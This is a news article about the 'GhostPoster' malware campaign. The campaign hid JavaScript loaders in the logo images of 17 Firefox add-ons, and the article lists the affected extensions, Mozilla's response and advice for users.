Security researchers have uncovered a troubling new malware campaign that has been hiding malicious code inside the logo images of popular Firefox browser extensions.
The campaign, dubbed “GhostPoster,” was uncovered by cybersecurity firm Koi Security, which identified 17 compromised Firefox add-ons that infected more than 50,000 users. These extensions appeared harmless but secretly ran malware in the background, offering features like free VPNs, weather updates, ad blockers, translation utilities, and mouse gesture tools. They secretly monitored users’ browsing activity and opened a backdoor inside their browsers.
Malware Hidden In Plain Sight
Instead of hiding malicious code where scanners normally look, the attackers embedded it into the extensions’ PNG logo images, a technique known as steganography. The photos are displayed normally in the browser, giving users no reason to suspect anything unusual.
When the extension loaded, it quietly scanned the raw data of its own logo file, located a hidden marker, and extracted the embedded JavaScript. This code acted as a loader, fetching the main malware payload from attacker-controlled servers.
Designed To Evade Detection
GhostPoster was designed to stay hidden for as long as possible. The loader waited 48 hours before activating and downloaded the main payload only 10% of the time, a tactic meant to evade network monitoring and security analysis.
Once retrieved, the payload was heavily obfuscated and encrypted, then stored quietly inside the browser to maintain long-term persistence. Researchers say this stealthy design would allow attackers to deploy more dangerous malware in the future with little warning.
What The Malware Did
While GhostPoster did not steal passwords or redirect users to phishing pages, it still posed a serious privacy and security risk. According to Koi Security, the malware could:
- Hijack affiliate links on major shopping sites, redirecting commissions to the attackers
- Inject Google Analytics tracking into every webpage a user visits
- Remove critical browser security protections, exposing users to clickjacking and other attacks
- Bypassing CAPTCHA systems used to block automated abuse
- Injecting invisible iframes to carry out ad fraud and click fraud
All affected extensions communicated with the same command-and-control infrastructure, indicating a single coordinated campaign. Researchers warned that the same infrastructure could easily deliver more dangerous malware in the future.
Popular Extensions Affected
The malicious add-ons came from well-known categories:
- free-vpn-forever
- screenshot-saved-easy
- weather-best-forecast
- crxmouse-gesture
- cache-fast-site-loader
- freemp3downloader
- google-translate-right-clicks
- google-traductor-esp
- world-wide-vpn
- dark-reader-for-ff
- translator-gbbd
- i-like-weather
- google-translate-pro-extension
- ??-??
- libretv-watch-free-videos
- ad-stop
- right-click-google-translate
Mozilla’s Response
Several of the malicious extensions were still available on the Firefox Add-ons marketplace when the findings were first reported. Mozilla later confirmed that it had removed all identified extensions and strengthened its automated detection systems.
“User safety is something we’ve always prioritized and taken very seriously. Our add-ons team has investigated this report and as a result, has taken action to remove all of these extensions from AMO. We have updated our automated systems to detect and block extensions using similar attacks now and in the future. We continue to improve our systems as new attacks appear,” a Mozilla spokesperson said in a statement.
What Users Should Do
Security experts urge users to uninstall any of the affected extensions immediately and consider resetting passwords for important accounts. They also recommend being cautious with installing browser extensions — especially those offering “free” services like VPNs.
As the GhostPoster campaign shows, even a simple extension logo can be weaponized, turning everyday tools into silent surveillance mechanisms.
